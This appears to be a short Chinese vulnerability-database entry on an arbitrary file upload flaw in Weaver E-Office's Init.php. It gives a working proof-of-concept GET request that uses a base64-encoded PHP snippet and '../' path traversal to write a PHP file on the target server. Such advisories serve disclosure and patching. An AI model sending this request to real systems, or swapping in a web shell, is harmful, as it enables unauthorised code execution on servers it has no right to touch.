泛微E-Office Init.php 任意文件上传漏洞

日期: 2023-08-11 | 影响软件: 泛微E-Office | POC: 已公开

漏洞描述

泛微E-Office Init.php 任意文件上传漏洞

PoC代码

GET /E-mobile/App/Init.php?m=createDo_Email&upload_file=PD9waHAgZWNobyBtZDUoJ290Z29seCcpO3VubGluayhfX0ZJTEVfXyk/Pg==&file_name=../dides.php HTTP/1.1

相关漏洞推荐